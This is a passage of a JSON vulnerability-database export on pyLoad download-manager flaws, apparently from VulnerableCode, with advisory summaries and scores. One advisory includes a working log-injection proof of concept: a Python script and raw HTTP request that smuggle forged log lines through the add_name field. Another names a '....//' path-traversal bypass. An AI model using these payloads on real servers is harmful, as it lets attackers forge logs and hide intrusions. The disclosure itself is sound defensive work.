tual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-47890"},{"reference_url":"https://github.com/advisories/GHSA-h73m-pcfw-25h2","reference_id":"GHSA-h73m-pcfw-25h2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h73m-pcfw-25h2"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2","reference_id":"GHSA-h73m-pcfw-25h2","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2"},{"reference_url":"http://pyload.com","reference_id":"pyload.com","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/"}],"url":"http://pyload.com"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81716?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev75","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-ktv2-2ay9-g7be"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xkag-9scb-bfhk"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev75"}],"aliases":["CVE-2023-47890","GHSA-h73m-pcfw-25h2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d2gv-3uu7-gudh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71538?format=json","vulnerability_id":"VCID-d7dw-6vnb-43a9","summary":"pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the ADMIN_ONLY_OPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35463","reference_id":"","reference_type":"","scores":[{"value":"0.00135","scoring_system":"epss","scoring_elements":"0.33099","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35463"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35463","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35463"},{"reference_url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_id":"c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/"}],"url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr","reference_id":"GHSA-w48f-wwwf-f5fr","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T14:45:57Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr"}],"fixed_packages":[],"aliases":["CVE-2026-35463","GHSA-w48f-wwwf-f5fr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d7dw-6vnb-43a9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360752?format=json","vulnerability_id":"VCID-ekx7-75uk-f7h5","summary":"Pyload log Injection via API /json/add_package in add_name parameter\n### Summary\nA log injection vulnerability was identified in `pyload` in API `/json/add_package`. This vulnerability allows user with add packages permission to inject arbitrary messages into the logs gathered by `pyload`.\n### Details\n`pyload` will generate a log entry when creating new package using API `/json/add_package`. This entry will be in the form of `Added package 'NAME_OF_PACKAGE' containing 'NUMBER_OF_LINKS' links`. However, when supplied with the name of new package containing a newline, this newline is not properly escaped. Newlines are also the delimiter between log entries. This allows the attacker to inject new log entries into the log file.\n\n### PoC\nRun `pyload` in the default configuration by running the following command\n```\npyload\n```\nWe can now sign in as the pyload user who at least have add packages permissions. In my example, I will use the admin account to demonstrate this vulnerability. Now as an admin user, view the logs at `http://localhost:8000/logs`\n<img width=\"1918\" height=\"912\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e6510af6-768b-4ddd-a4f2-3972618e1d37\" />\nAny attacker who at least have add packages permissions can now make the following request by crafting a python code to inject arbitrary logs.\n```\nimport requests\n\nsession = requests.session()\n\nburp0_url = \"http://localhost:8000/json/add_package\"\nburp0_cookies = {\"pyload_session_8000\": \"SESSION-ID-HERE\"}\nburp0_headers = {\"sec-ch-ua-platform\": \"\\\"Windows\\\"\", \"Accept-Language\": \"en-US,en;q=0.9\", \"sec-ch-ua\": \"\\\"Not)A;Brand\\\";v=\\\"8\\\", \\\"Chromium\\\";v=\\\"138\\\"\", \"sec-ch-ua-mobile\": \"?0\", \"X-Requested-With\": \"XMLHttpRequest\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\", \"Accept\": \"*/*\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf\", \"Origin\": \"http://localhost:8000\", \"Sec-Fetch-Site\": \"same-origin\", \"Sec-Fetch-Mode\": \"cors\", \"Sec-Fetch-Dest\": \"empty\", \"Referer\": \"http://localhost:8000/collector\", \"Accept-Encoding\": \"gzip, deflate, br\", \"Connection\": \"keep-alive\"}\nburp0_data = \"------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_name\\\"\\r\\n\\r\\nFake new package containing 1 links\\r\\n[2025-07-23 04:32:19]  PWNED               SeaWind  GET PWNED\\r\\n[2025-07-23 04:32:19]  INFO                pyload Added package Normal package\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_links\\\"\\r\\n\\r\\n123\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_password\\\"\\r\\n\\r\\n123\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_file\\\"; filename=\\\"tt\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\\r\\nContent-Disposition: form-data; name=\\\"add_dest\\\"\\r\\n\\r\\n0\\r\\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf--\\r\\n\"\nsession.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)\n```\nThe Burpsuite HTTP Request for the above code\n```\nPOST /json/add_package HTTP/1.1\nHost: localhost:8000\nContent-Length: 799\nsec-ch-ua-platform: \"Windows\"\nAccept-Language: en-US,en;q=0.9\nsec-ch-ua: \"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\"\nsec-ch-ua-mobile: ?0\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf\nOrigin: http://localhost:8000\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost:8000/collector\nAccept-Encoding: gzip, deflate, br\nCookie: pyload_session_8000=SESSIONS-ID-HERE\nConnection: keep-alive\n\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_name\"\n\nFake new package containing 1 links\n[2025-07-23 04:32:19]  HACKER               SeaWind  GET PWNED\n[2025-07-23 04:32:19]  INFO               pyload Added package Normal package\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_links\"\n\n123\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_password\"\n\n123\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_file\"; filename=\"tt\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf\nContent-Disposition: form-data; name=\"add_dest\"\n\n0\n------WebKitFormBoundaryqRJM6zIUcE7ttXDf--\n\n```\nAfter executing the following python code and send the request successfully, if we now were to look at the logs again, we see that the entry has successfully been injected.\n<img width=\"1920\" height=\"911\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0e77c7ac-e5f6-4227-843a-ef548071bf02\" />\n\n### Impact\nForged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act.","references":[{"reference_url":"https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3"},{"reference_url":"https://github.com/advisories/GHSA-3wwm-hjv7-23r3","reference_id":"GHSA-3wwm-hjv7-23r3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3wwm-hjv7-23r3"}],"fixed_packages":[],"aliases":["GHSA-3wwm-hjv7-23r3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ekx7-75uk-f7h5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70631?format=json","vulnerability_id":"VCID-fygw-7zvj-h3d5","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42314","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18668","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42314"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-128.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-128.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42314","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42314"},{"reference_url":"https://github.com/advisories/GHSA-97r3-5w84-r4q8","reference_id":"GHSA-97r3-5w84-r4q8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-97r3-5w84-r4q8"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8","reference_id":"GHSA-97r3-5w84-r4q8","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:33:35Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42314","GHSA-97r3-5w84-r4q8","PYSEC-2026-128"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fygw-7zvj-h3d5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53009?format=json","vulnerability_id":"VCID-g4ak-155r-qufh","summary":"pyload is an open-source Download Manager written in pure Python. An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution. There is no fix available at the time of publication.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32880","reference_id":"","reference_type":"","scores":[{"value":"0.04609","scoring_system":"epss","scoring_elements":"0.89494","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32880"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32880","reference_id":"CVE-2024-32880","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32880"},{"reference_url":"https://github.com/advisories/GHSA-3f7w-p8vr-4v5f","reference_id":"GHSA-3f7w-p8vr-4v5f","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3f7w-p8vr-4v5f"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f","reference_id":"GHSA-3f7w-p8vr-4v5f","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-04-26T18:47:38Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f"}],"fixed_packages":[],"aliases":["CVE-2024-32880","GHSA-3f7w-p8vr-4v5f"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g4ak-155r-qufh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/77798?format=json","vulnerability_id":"VCID-hcq5-zndz-uucx","summary":"pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, PyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init. Version 0.5.0b3.dev97 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33992","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.1008","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33992"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992"},{"reference_url":"https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8","reference_id":"b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/"}],"url":"https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8"},{"reference_url":"https://github.com/advisories/GHSA-m74m-f7cr-432x","reference_id":"GHSA-m74m-f7cr-432x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m74m-f7cr-432x"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x","reference_id":"GHSA-m74m-f7cr-432x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x"}],"fixed_packages":[],"aliases":["CVE-2026-33992","GHSA-m74m-f7cr-432x"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hcq5-zndz-uucx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/127977?format=json","vulnerability_id":"VCID-jhhh-f1ff-1bfk","summary":"pyLoad is a free and open-source download manager written in Python. In versions prior to 0.5.0b3.dev91, pyLoad web interface contained insufficient input validation in both the Captcha script endpoint and the Click'N'Load (CNL) Blueprint. This flaw allowed untrusted user input to be processed unsafely, which could be exploited by an attacker to inject arbitrary content into the web UI or manipulate request handling. The vulnerability could lead to client-side code execution (XSS) or other unintended behaviors when a malicious payload is submitted. user-supplied parameters from HTTP requests were not adequately validated or sanitized before being passed into the application logic and response generation. This allowed crafted input to alter the expected execution flow. CNL (Click'N'Load) blueprint exposed unsafe handling of untrusted parameters in HTTP requests. The application did not consistently enforce input validation or encoding, making it possible for an attacker to craft malicious requests. Version 0.5.0b3.dev91 contains a patch for the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-61773","reference_id":"","reference_type":"","scores":[{"value":"0.00067","scoring_system":"epss","scoring_elements":"0.20965","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-61773"},{"reference_url":"https://github.com/pyload/pyload/pull/4624","reference_id":"4624","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/"}],"url":"https://github.com/pyload/pyload/pull/4624"},{"reference_url":"https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca","reference_id":"5823327d0b797161c7195a1f660266d30a69f0ca","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/"}],"url":"https://github.com/pyload/pyload/commit/5823327d0b797161c7195a1f660266d30a69f0ca"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61773","reference_id":"CVE-2025-61773","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-61773"},{"reference_url":"https://github.com/advisories/GHSA-cjjf-27cc-pvmv","reference_id":"GHSA-cjjf-27cc-pvmv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjjf-27cc-pvmv"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv","reference_id":"GHSA-cjjf-27cc-pvmv","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34145?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev91","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91"}],"aliases":["CVE-2025-61773","GHSA-cjjf-27cc-pvmv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jhhh-f1ff-1bfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80870?format=json","vulnerability_id":"VCID-kjru-xrvh-1bad","summary":"pyLoad is a free and open-source download manager written in Python. Versions up to and including 0.5.0b3.dev97 cache `role` and `permission` in the session at login and continues to authorize requests using these cached values, even after an admin changes the user's role/permissions in the database. As a result, an already logged-in user can keep old (revoked) privileges until logout/session expiry, enabling continued privileged actions. This is a core authorization/session-consistency issue and is not resolved by toggling an optional security feature. Commit e95804fb0d06cbb07d2ba380fc494d9ff89b68c1 contains a fix for the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41133","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13711","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41133"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41133","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41133"},{"reference_url":"https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1","reference_id":"e95804fb0d06cbb07d2ba380fc494d9ff89b68c1","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P